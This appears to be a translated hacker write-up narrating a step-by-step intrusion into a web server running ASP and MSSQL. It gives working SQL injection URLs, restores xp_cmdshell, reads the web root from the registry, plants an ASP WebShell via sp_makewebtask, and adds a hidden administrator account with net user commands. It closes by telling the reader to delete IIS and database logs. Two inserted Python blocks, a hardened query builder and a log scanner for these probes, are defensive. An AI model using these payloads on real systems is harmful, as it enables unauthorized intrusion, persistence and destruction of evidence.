Obtaining system privileges using script alone

zhaozj  2021-02-16

1. Footprinting

Footprinting is the first step of any security test against a server, so let's begin with a port scan. I took out a very good scanner a friend of mine wrote; it is fast and can run 2,000 threads at once. (WTF: nice!) It went through ports 1-65535 in short order. The open ports found were: 21, 80, 1433, 3389. A second scan gave the same result, so that is almost certainly accurate.

Since Blaster (冲击波), servers on the network have become a lot more secure, and breaking in through system vulnerabilities has become difficult. My first thought was to aim at ports 21 and 1433 and simply hope to turn up a weak password. (WTF: dream on!) No luck: I scanned for a long while and, as has become usual these days, found nothing. So the only way in was through the website's scripts.

2. Exploring the website thoroughly

Port 1433 is open, which means SQL Server is running. Sites like this are generally built on ASP + MSSQL, and ASP scripts are easier to inject than other scripting languages; the injection flaws are also more numerous. The usual first check is to append a single quote to a submitted parameter: if the parameter is not filtered, IE normally returns an error message. I quickly found a parameter with no filtering at all.

Submit: http://www.something.com/script.asp?id=2'
IE returns an error.
Submit: http://www.something.com/script.asp?id=2 and 1=1
IE returns the record normally.
Submit: http://www.something.com/script.asp?id=2 and 1=2
IE returns no record.

OK, that confirms the vulnerability. Now let's use it to learn something about the server and the database.
For example, to see the server's patch level, submit:
http://www.something.com/script.asp?id=2 and 1=(select @@version)
This errors out, and IE hands the error message back to us, as shown in Figure 1. Figure 1 shows the server has SP4 applied. There are "said to be" overflow exploits even for SP4, both for port 80 and for MSSQL SP3, but those are "absolutely confidential"; very few people have them and I certainly don't, so I'll have to take him on as he is. Moving on! At the system level this server is fairly secure, so I still have to work from the script side. Let's look at what privileges the database connection account has: does it hold the sysadmin server role? WTF: IS_SRVROLEMEMBER('role' [, 'login']) tests whether a login is a member of the given server role. role is the name of the server role being checked; login is optional, and if it is omitted the current login is used.

It returns 1 if login is a member of role, 0 if not, and NULL if role or login is invalid.

I nearly sprayed tea across the screen: the server role of the account the site connects with is actually sysadmin! See Figure 2. Ha! It looks like the site connects as the sa account. Submit:
http://www.something.com/script.asp?id=2 and 'sa'=(select system_user)
to check whether the connection account is sa. IE again returns normally, which proves the account really is sa. Privileges don't get any higher than that. WTF: when an application role is active, SELECT USER returns the name of the current application role; to get the identity of the logged-in user, use the Transact-SQL statement SELECT SYSTEM_USER.

At this point many people will think of using the xp_cmdshell extended stored procedure to add a system account and then connecting to the server with Terminal Services. A very good idea! I am one of those many people, so let's try it.

3. Getting a WebShell through MSSQL stored procedures

First, has the administrator deleted xp_cmdshell? Submit:
http://www.something.com/script.asp?id=2 and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')
IE's response shows that xp_cmdshell has been deleted. Well, let's restore it:
http://www.something.com/script.asp?id=2;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'
Then check again whether xp_cmdshell is back:
http://www.something.com/script.asp?id=2 and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')
(WTF: in a later attempt the editor found that xp_cmdshell had been restored. Heh, I wonder which brother left that behind?) Same result as before, nothing returned. So the administrator has renamed the xplog70.dll dynamic link library.
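The flaw the whole write-up rests on is the one found in section 2: the id parameter is pasted into the query unfiltered, and the site connects as sa. As an added example (not code from the page or the site it describes), here is that vulnerable string-building pattern beside a hardened form, run against the page's own probes; the table and column names are assumed.

```python
import re

# Hypothetical table and column names: the page never shows the ASP script's query.
_ID_RE = re.compile(r"[0-9]{1,9}")


def build_query_unsafe(id_param):
    """The pattern the write-up exploits: the raw request parameter is
    concatenated into the SQL text, so anything after the digits becomes SQL."""
    return "SELECT title, body FROM articles WHERE id = " + id_param


def build_query_safe(id_param):
    """Hardened form: enforce the integer type before the value reaches SQL,
    then hand it to the driver as a bound parameter rather than as text."""
    if not _ID_RE.fullmatch(id_param.strip()):
        raise ValueError("id must be a positive integer")
    return ("SELECT title, body FROM articles WHERE id = ?", (int(id_param),))


# Constructed probes, each taken from the write-up's own sequence.
PROBES = [
    "2'",
    "2 and 1=1",
    "2 and 1=2",
    "2 and 1=(select @@version)",
    "2;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'",
]


def probe_results():
    """For each probe, report whether the hardened builder accepted or rejected
    it; the unsafe builder accepts all of them and emits the injected SQL."""
    results = []
    for p in PROBES:
        try:
            build_query_safe(p)
            verdict = "accepted"
        except ValueError:
            verdict = "rejected"
        results.append((p, verdict))
    return results


if __name__ == "__main__":
    for probe, verdict in probe_results():
        print(f"{verdict:8s} {probe!r}")
        print("   unsafe SQL:", build_query_unsafe(probe))
    print("safe:", build_query_safe("2"))
```

Binding the parameter defeats every probe above, but the other half of the fix is the login: nothing past section 2 works unless IS_SRVROLEMEMBER('sysadmin') returns 1 for the account the site uses.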
If the DLL has not simply been deleted, direct restoration still won't work either way. All I can say is "I'll bear it". With such a big hole it would be a shame not to use it; I'm not willing to give up, it's too powerful. Let's set him aside for now: once I have a WebShell I will naturally have a way to deal with him, hahaha... (evil grin!). So, how to get a WebShell? Have you read n.e.v.e.r's and czy's articles? Both describe methods of getting a WebShell in detail. I have also turned their methods into a program for my own convenience, but the hard part is getting the web root's absolute path: where does the Trojan we generate end up? That is a problem many gurus have been studying. Fortunately, I understand MSSQL reasonably well.

I have a way to get the web absolute path; follow along. (WTF: this is a really big highlight, everyone take a look!) We will use two MSSQL stored procedures, so first an introduction to the xp_regread extended stored procedure and the sp_makewebtask Web Assistant stored procedure. xp_regread reads registry information; we use it to read the web absolute path, which is stored in the registry. sp_makewebtask is what gets us the WebShell: its main function is to export records from a table in the database to a file whose name you can specify yourself, and of course we specify an ASP script file! If the script code is saved in the table, the exported file is the script file, so the record we add is the script code. I don't use n.e.v.e.r's approach here; his way is to export a database file, which is relatively large and full of garbage, and if that garbage contains ASP tags the result is broken ASP code that mostly returns a 500 error when opened. So we use czy's method, which gets the shell with a web job.

(1) How to get the web absolute path? I spent a long time studying this. Everyone knows that MS keeps its settings in the registry, and the web root can be found at:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots
With the stored procedure xp_regread we can fetch its value:
EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/'
That reads it, but now the problem is how to get the value back to us through IE. My method: create a temporary table with one field of type char(255), which we use to hold the value of the web absolute path. After the table is built, read the registry as above and save the returned value in a variable.
Then insert the record (the value of the variable) into the new table, so the path is written into the table. Submit:
DECLARE @result varchar(255); EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result OUTPUT; INSERT INTO <temporary table> VALUES (@result);--
Then submit:
and 1=(select count(*) from <temporary table> where <field> > 1)
and IE's error message reports the web path we just inserted. I also tried making the variable itself raise an error so that IE would return its value, but that failed, which is why I came up with the temporary-table approach. Finally, drop the temporary table we built. With the WebShell obtained, this part of the work is done.

(2) How to get the WebShell? czy's article already covers this in great detail, so I will only mention it briefly. Create a table with one field, and add the contents of the Trojan to that field.

Then export the contents to an ASP script under the web absolute path via the sp_makewebtask stored procedure, drop the temporary table again, and everything is done. For example:
exec sp_makewebtask @outputfile='<web absolute path>\<export file name>.asp', @query='SELECT <your field> FROM <your temporary table>'
And out comes the result. Of course, I have written a program for this, so I don't have to go to the trouble of adding the data line by line myself (WTF: this issue carries a detailed introduction; nobody will be disappointed!).

Methods and ideas written down, now let's act. First check whether the two stored procedures have been deleted; if they have, I don't want to live anymore! Submit:
http://www.something.com/script.asp?id=2 and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread')
Submit:
http://www.something.com/script.asp?id=2 and 1=(select count(*) from master.dbo.sysobjects where name='sp_makewebtask')
La la la! What a day, I'm happier than at New Year: both returned normally, so neither of the two stored procedures I need has been deleted. WTF note: administrators generally don't delete these two, perhaps because they know little about them and pay them no attention. That is exactly where the danger lies! Heh heh.

OK, now to get the web absolute path. Create a table:
http://www.something.com/script.asp?id=2;create table [dbo].[cyfd] ([gyfd] [char](255));--
That successfully creates a table named cyfd with a single field named gyfd of type char and length 255. Then add data to the table:
http://www.something.com/script.asp?id=2;declare @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd values (@result);--
This reads the web absolute path from the registry and inserts it into the table we just built.
Then make it report the absolute path for the WebShell:
http://www.something.com/script.asp?id=2 and 1=(select count(*) from cyfd where gyfd > 1)
IE returns an error, and in it we get the web absolute path: "D:\Inetpub\wwwroot"! All that effort has paid off. Time for tea! See Figure 3. Then drop the table we just built:
http://www.something.com/script.asp?id=2;drop table cyfd;--
OK, path in hand.

Open the program I wrote for getting the WebShell, enter the vulnerable URL http://www.yfd.com/yfd.com?id=2, and enter the absolute path to save the Trojan to: D:\inetpub\wwwroot. The Trojan is already configured, and its code is stripped down to only 30 lines so that submitting it to the server is fast. Its main function is to take input and save that input as a file; through such a small Trojan we can then plant a more powerful script Trojan such as the Ocean ASP Trojan. In less than a minute the program had finished. Enter the corresponding path and, wahaha (WTF: brothers, want a taste of this "drink"? Haha!), the WebShell is up, and the Ocean Trojan is in place at top speed, as shown in Figures 4 and 5. I live in happiness! (WTF often says that sentence; I seem to have caught it today.) On to the next step!

4. Restoring xp_cmdshell and getting system privileges

The rest is very simple; in under ten minutes you have an administrator account. Earlier I said xp_cmdshell had been deleted and could not be restored, because the administrator had deleted or renamed the xplog70.dll file. No matter: with a WebShell we just upload our own xplog70.dll and everything is solved. I quickly uploaded xplog70.dll to the E:\inetpub\wwwroot directory, then restored the procedure using an absolute path, which sp_addextendedproc supports:
http://www.something.com/script.asp?id=2;exec master.dbo.sp_addextendedproc 'xp_cmdshell','E:\inetpub\wwwroot\xplog70.dll'
See Figure 6. OK, now use IE to check whether it has been restored. Submit:
http://www.something.com/script.asp?id=2 and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')
Heh heh, it returns normally. Restored; does it still refuse me? Ha ha!
Add an account:
http://www.something.com/script.asp?id=2;exec master.dbo.xp_cmdshell 'net user chouyfd Chouyfd1314yf /add'
and promote it to administrator:
http://www.something.com/script.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators chouyfd /add'
Done. Open a Terminal Services connection and log in! Ha, finally. At this point I have successfully obtained a system administrator account on this host, as shown in Figure 7. What remains is to clear the logs and leave a solid backdoor, then vanish!

5. Cleanup

Once connected over Terminal Services, delete the IIS logs and the MSSQL logs as fast as you can. At the same time, delete xp_cmdshell again, so that the administrator doesn't notice anything.
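Every step in this write-up arrives as a GET request and lands in the IIS log, so as an added example (not part of the original article) here is a small Python scanner that parses IIS W3C lines and groups the page's probe stages by client; the log excerpt is constructed, and the signature names are my own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Signatures for the probe stages the write-up above walks through.
SIGNATURES = [
    ("quote-probe", re.compile(r"[?&]\w+=\d+'")),
    ("boolean-blind", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("error-based", re.compile(r"=\s*\(\s*select\b", re.I)),
    ("sysobjects-enum", re.compile(r"master\.dbo\.sysobjects", re.I)),
    ("stacked-exec", re.compile(r";\s*exec(ute)?\b", re.I)),
    ("dangerous-proc", re.compile(
        r"xp_cmdshell|xp_regread|sp_makewebtask|sp_addextendedproc", re.I)),
]

# Constructed IIS W3C excerpt (not from the page); the query is URL-encoded as IIS logs it.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-03-01 10:00:09 10.0.0.5 GET /script.asp id=2%27 500
2004-03-01 10:00:15 10.0.0.5 GET /script.asp id=2+and+1=1 200
2004-03-01 10:00:16 10.0.0.5 GET /script.asp id=2+and+1=2 200
2004-03-01 10:00:40 10.0.0.5 GET /script.asp id=2+and+1=(select+@@version) 500
2004-03-01 10:01:02 10.0.0.5 GET /script.asp id=2;exec+master.dbo.sp_addextendedproc+%27xp_cmdshell%27,%27xplog70.dll%27 200
2004-03-01 10:02:11 10.0.0.5 GET /script.asp id=2+and+1=(select+count(*)+from+master.dbo.sysobjects+where+name=%27sp_makewebtask%27) 500
2004-03-01 10:05:00 192.0.2.9 GET /script.asp id=7 200
"""


def parse_w3c(line):
    """Parse one W3C line into ip/url/status; None for directives or short lines."""
    parts = line.split()
    if line.startswith("#") or len(parts) < 7:
        return None
    _, _, ip, _, stem, query, status = parts[:7]
    query = "" if query == "-" else unquote_plus(query)   # IIS logs "-" for no query
    return {"ip": ip, "url": stem + "?" + query, "status": status}


def scan(log_text):
    """Return {client_ip: sorted signature names}; one client tripping several stages is the chain above."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_w3c(line)
        if rec is None:
            continue
        for name, rx in SIGNATURES:
            if rx.search(rec["url"]):
                seen[rec["ip"]].add(name)
    return {ip: sorted(names) for ip, names in seen.items()}


def suspects(log_text, min_stages=3):
    """Clients that tripped at least min_stages distinct signatures."""
    return [ip for ip, names in scan(log_text).items() if len(names) >= min_stages]
```

Run it on a real log with scan(open(path).read()); stages arriving in order from one client, with 500s on the error-based steps, are the signal, whereas a lone quote-probe is often just a typo.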

Please credit the original URL when reposting: https://www.9cbs.com/read-15817.html
